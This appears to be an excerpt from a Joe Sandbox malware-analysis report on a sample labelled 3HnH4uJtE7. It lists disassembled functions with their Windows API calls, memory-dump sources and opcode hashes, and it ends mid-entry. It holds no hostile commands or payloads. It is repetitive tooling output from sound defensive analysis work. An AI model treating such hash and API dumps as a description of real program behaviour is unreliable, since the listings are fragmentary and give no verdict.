                                                                    Function 00941571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00941014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0094102A
                                                                      • Part of subcall function 00941014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00941036
                                                                      • Part of subcall function 00941014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00941045
                                                                      • Part of subcall function 00941014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0094104C
                                                                      • Part of subcall function 00941014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00941062
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009415BE
                                                                    • _memcmp.LIBVCRUNTIME ref: 009415E1
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00941617
                                                                    • HeapFree.KERNEL32(00000000), ref: 0094161E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                    • String ID:
                                                                    • API String ID: 1592001646-0
                                                                    • Opcode ID: 85732f6af64434cdec1c5d98b85111780b45edaaffcf43c956d3182943231252
                                                                    • Instruction ID: 26fcaa3b8d33b97adfb13a1e8b815006dcf237504a5750bdc52120595d24c009
                                                                    • Opcode Fuzzy Hash: 85732f6af64434cdec1c5d98b85111780b45edaaffcf43c956d3182943231252
                                                                    • Instruction Fuzzy Hash: 56219A72E00209EFDF04DFA4C945FEEB7B8EF84344F098459E445AB241E730AA85DBA0
                                                                    Function 00972782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0097280A
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00972824
                                                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00972832
                                                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00972840
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long$AttributesLayered
                                                                    • String ID:
                                                                    • API String ID: 2169480361-0
                                                                    • Opcode ID: 8f8d4ae05ca392f26cee1384ea37f888cec8687bf8091b4db77a077cf0def1cd
                                                                    • Instruction ID: 230b6cb9ed3c17b6e12dbbb1dd08865fce5b84de65f712e9e01a0af57042a205
                                                                    • Opcode Fuzzy Hash: 8f8d4ae05ca392f26cee1384ea37f888cec8687bf8091b4db77a077cf0def1cd
                                                                    • Instruction Fuzzy Hash: B621B632618511AFD7149B24C845FAA7B99FF86324F14815CF42ACB6D2C776FC82C791
                                                                    Function 009478F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00948D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0094790A,?,000000FF,?,00948754,00000000,?,0000001C,?,?), ref: 00948D8C
                                                                      • Part of subcall function 00948D7D: lstrcpyW.KERNEL32(00000000,?,?,0094790A,?,000000FF,?,00948754,00000000,?,0000001C,?,?,00000000), ref: 00948DB2
                                                                      • Part of subcall function 00948D7D: lstrcmpiW.KERNEL32(00000000,?,0094790A,?,000000FF,?,00948754,00000000,?,0000001C,?,?), ref: 00948DE3
                                                                    • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00948754,00000000,?,0000001C,?,?,00000000), ref: 00947923
                                                                    • lstrcpyW.KERNEL32(00000000,?,?,00948754,00000000,?,0000001C,?,?,00000000), ref: 00947949
                                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,00948754,00000000,?,0000001C,?,?,00000000), ref: 00947984
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: lstrcmpilstrcpylstrlen
                                                                    • String ID: cdecl
                                                                    • API String ID: 4031866154-3896280584
                                                                    • Opcode ID: 68931104726e15f16561bf5821f93bc0f261ba7bb0a4df3fdf8807467c4c6a0b
                                                                    • Instruction ID: b9fa31bf7f25157a83a17f49247fb541627d2f41856c1c83fa24383412860a2d
                                                                    • Opcode Fuzzy Hash: 68931104726e15f16561bf5821f93bc0f261ba7bb0a4df3fdf8807467c4c6a0b
                                                                    • Instruction Fuzzy Hash: 7B11223A204346AFCB159F78C844E7BB7A9FF85390B40402AF906CB3A4EB319801D7A1
                                                                    Function 00977CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00977D0B
                                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00977D2A
                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00977D42
                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0095B7AD,00000000), ref: 00977D6B
                                                                      • Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Long
                                                                    • String ID:
                                                                    • API String ID: 847901565-0
                                                                    • Opcode ID: 0d39629b581245c1a10147dae865189388275a1f61a07fc5031dc22c49c4563a
                                                                    • Instruction ID: 3627afa4ac1c868c5480653976e53bc5e113838925bf1d049806bb73ebe4bc52
                                                                    • Opcode Fuzzy Hash: 0d39629b581245c1a10147dae865189388275a1f61a07fc5031dc22c49c4563a
                                                                    • Instruction Fuzzy Hash: 8511D233118615AFCB208FA8DC04AA67BA8BF85370B158728F83DC72F0D7318960DB90
                                                                    Function 00975660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001060,?,00000004), ref: 009756BB
                                                                    • _wcslen.LIBCMT ref: 009756CD
                                                                    • _wcslen.LIBCMT ref: 009756D8
                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00975816
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend_wcslen
                                                                    • String ID:
                                                                    • API String ID: 455545452-0
                                                                    • Opcode ID: aa7f5b34a3cd3efd689a57e2e7adf04140d3166ec5afcb51b215f7e255bf7128
                                                                    • Instruction ID: efe0420b01e764d04e5245719990b3ce7cbbdf5bad128238048a8c26e3d98494
                                                                    • Opcode Fuzzy Hash: aa7f5b34a3cd3efd689a57e2e7adf04140d3166ec5afcb51b215f7e255bf7128
                                                                    • Instruction Fuzzy Hash: 1C11D373A006089ADF609F61CC85AEE77ACEF50764F51C42AFA1DD6081E7B4DA80CB60
                                                                    Function 00911D09 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 691c56d1b9f67975dd4181d5746375ca0a92c5bb13d612fcc822139cc490ae09
                                                                    • Instruction ID: a8b39d6e58f755a5e5d27de30427aa0e6f47725530b29feac309c3bf7014be15
                                                                    • Opcode Fuzzy Hash: 691c56d1b9f67975dd4181d5746375ca0a92c5bb13d612fcc822139cc490ae09
                                                                    • Instruction Fuzzy Hash: 100162B631961E7FF61126787CC1FA7671DDF813B8B340729F635551D2DB608C905160
                                                                    Function 00941A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00941A47
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00941A59
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00941A6F
                                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00941A8A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID:
                                                                    • API String ID: 3850602802-0
                                                                    • Opcode ID: 77a23dfa78c7c64420961047ebf48eab09e82899bd551fec170d9b9f6f91bf66
                                                                    • Instruction ID: f5e2fff707b31e11993dae7f4fedebc56b1f99e6e61a399b769761c2b77bd29d
                                                                    • Opcode Fuzzy Hash: 77a23dfa78c7c64420961047ebf48eab09e82899bd551fec170d9b9f6f91bf66
                                                                    • Instruction Fuzzy Hash: 5611397AD01219FFEF10DBA4CD85FADBB78EB08750F200495EA04B7290D671AE90DB94
                                                                    Function 0094E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 0094E1FD
                                                                    • MessageBoxW.USER32(?,?,?,?), ref: 0094E230
                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0094E246
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0094E24D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                    • String ID:
                                                                    • API String ID: 2880819207-0
                                                                    • Opcode ID: 74b61ef5c8fa9472da737143d60e93a966090ea6b75862f0afb196b87e573966
                                                                    • Instruction ID: 8d1c0cae9255499256d2bcb6e09085ff97e937d7e828686580589d5aa7e7f862
                                                                    • Opcode Fuzzy Hash: 74b61ef5c8fa9472da737143d60e93a966090ea6b75862f0afb196b87e573966
                                                                    • Instruction Fuzzy Hash: 43112BB6918214BFC7019FA89C09EAF7FECAB45320F404329F825E3290D6B0CD0097A0
                                                                    Function 0090D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateThread.KERNEL32(00000000,?,0090CFF9,00000000,00000004,00000000), ref: 0090D218
                                                                    • GetLastError.KERNEL32 ref: 0090D224
                                                                    • __dosmaperr.LIBCMT ref: 0090D22B
                                                                    • ResumeThread.KERNEL32(00000000), ref: 0090D249
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                    • String ID:
                                                                    • API String ID: 173952441-0
                                                                    • Opcode ID: c599bee6fbadac923d0c820bb22fb3065eaf4e577988f5274e0a4c7a26a0fd65
                                                                    • Instruction ID: a5ff52068f46bc04b82b962676f3263f122d43287ea961e30d86e02722f6d906
                                                                    • Opcode Fuzzy Hash: c599bee6fbadac923d0c820bb22fb3065eaf4e577988f5274e0a4c7a26a0fd65
                                                                    • Instruction Fuzzy Hash: 1101D27680A208BFDB216BE9DC09BAE7A6DDFC1730F100219F939961D0CF718941D7A0
                                                                    Function 00979EF3 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 008F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 008F9BB2
                                                                    • GetClientRect.USER32(?,?), ref: 00979F31
                                                                    • GetCursorPos.USER32(?), ref: 00979F3B
                                                                    • ScreenToClient.USER32(?,?), ref: 00979F46
                                                                    • DefDlgProcW.USER32(?,00000020,?,00000000,?,?,?), ref: 00979F7A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                                    • String ID:
                                                                    • API String ID: 4127811313-0
                                                                    • Opcode ID: fd608cb53bff9cf97d7243a7ec6fdd651b0abcb144f5993f9946b8ba25ef21d0
                                                                    • Instruction ID: d841847a67108a2ea3112833f3fa147060fe00ce414e540553646dc330c17d71
                                                                    • Opcode Fuzzy Hash: fd608cb53bff9cf97d7243a7ec6fdd651b0abcb144f5993f9946b8ba25ef21d0
                                                                    • Instruction Fuzzy Hash: 27114572A0461AEBDB10EFA8D889AEE77B8FB45311F408455F905E3140D730BE81DBA1
                                                                    Function 008E600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 008E604C
                                                                    • GetStockObject.GDI32(00000011), ref: 008E6060
                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 008E606A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: CreateMessageObjectSendStockWindow
                                                                    • String ID:
                                                                    • API String ID: 3970641297-0
                                                                    • Opcode ID: 36c5b466e80631f0717e948035140b8669665fe0f6a6608aeab72586110585a9
                                                                    • Instruction ID: 969b4dd45832101dfc91160f4e4195fe40922a0464c90db3869f0ec15f0b6223
                                                                    • Opcode Fuzzy Hash: 36c5b466e80631f0717e948035140b8669665fe0f6a6608aeab72586110585a9
                                                                    • Instruction Fuzzy Hash: F711A1B3105958BFEF125F959C44EEA7B69FF293A4F000215FE04A2010D732ACA0EB90
                                                                    Function 00903B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 00903B56
                                                                      • Part of subcall function 00903AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00903AD2
                                                                      • Part of subcall function 00903AA3: ___AdjustPointer.LIBCMT ref: 00903AED
                                                                    • _UnwindNestedFrames.LIBCMT ref: 00903B6B
                                                                    • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00903B7C
                                                                    • CallCatchBlock.LIBVCRUNTIME ref: 00903BA4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                    • String ID:
                                                                    • API String ID: 737400349-0
                                                                    • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                    • Instruction ID: d9d04a05a558a5d4e87661a111384c4cb81ed2440adf1066f8ed85861bd27759
                                                                    • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                    • Instruction Fuzzy Hash: 70012972100148BFDF126E95CC42EEB3B7EEF88758F048414FE48A6161C732E961EBA0
                                                                    Function 00913073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,008E13C6,00000000,00000000,?,0091301A,008E13C6,00000000,00000000,00000000,?,0091328B,00000006,FlsSetValue), ref: 009130A5
                                                                    • GetLastError.KERNEL32(?,0091301A,008E13C6,00000000,00000000,00000000,?,0091328B,00000006,FlsSetValue,00982290,FlsSetValue,00000000,00000364,?,00912E46), ref: 009130B1
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0091301A,008E13C6,00000000,00000000,00000000,?,0091328B,00000006,FlsSetValue,00982290,FlsSetValue,00000000), ref: 009130BF
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 3177248105-0
                                                                    • Opcode ID: 29e6550fc0d54c0339ffa8e1abbba3386389db7326e54111efbbfcdf5170557e
                                                                    • Instruction ID: db82cb617d733fa7a5555d2a8378b7da7ad4efa039104b8ae15fd85f9583809e
                                                                    • Opcode Fuzzy Hash: 29e6550fc0d54c0339ffa8e1abbba3386389db7326e54111efbbfcdf5170557e
                                                                    • Instruction Fuzzy Hash: C7012B7331962AABCB314B799C449A77BECAF49B71B118734F919E3140DB21DA81C7E0
                                                                    Function 00947464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0094747F
                                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00947497
                                                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009474AC
                                                                    • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 009474CA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743580502.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_8e0000_3HnH4uJtE7.jbxd
                                                                    Similarity
                                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                                    • String ID:
                                                                    • API String ID: 1352324309-0
                                                                    • Opcode ID: 6f9005748234e25b60398e92187eb6e20a981398e2872e9f501820f38fe52d43
                                                                    • Instruction ID: e9ab7488021e97411408b474f21860a289b0ef01eedf4359d7cba6696f790b83
                                                                    • Opcode Fuzzy Hash: 6f9005748234e25b60398e92187eb6e20a981398e2872e9f501820f38fe52d43
                                                                    • Instruction Fuzzy Hash: 5E1161B52093199BE7208F94DC09FA2BBFDEB00B04F10896DA65AD6161D774E944DBA0
                                                                    Function 0094B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0094ACD3,?,00008000), ref: 0094B0C4
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0094ACD3,?,00008000), ref: 0094B0E9
                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0094ACD3,?,00008000), ref: 0094B0F3
                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0094ACD3,?,00008000), ref: 0094B126
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1743497626.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                    • Associated: 00000000.00000002.1743485787.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743537421.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1743568554.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
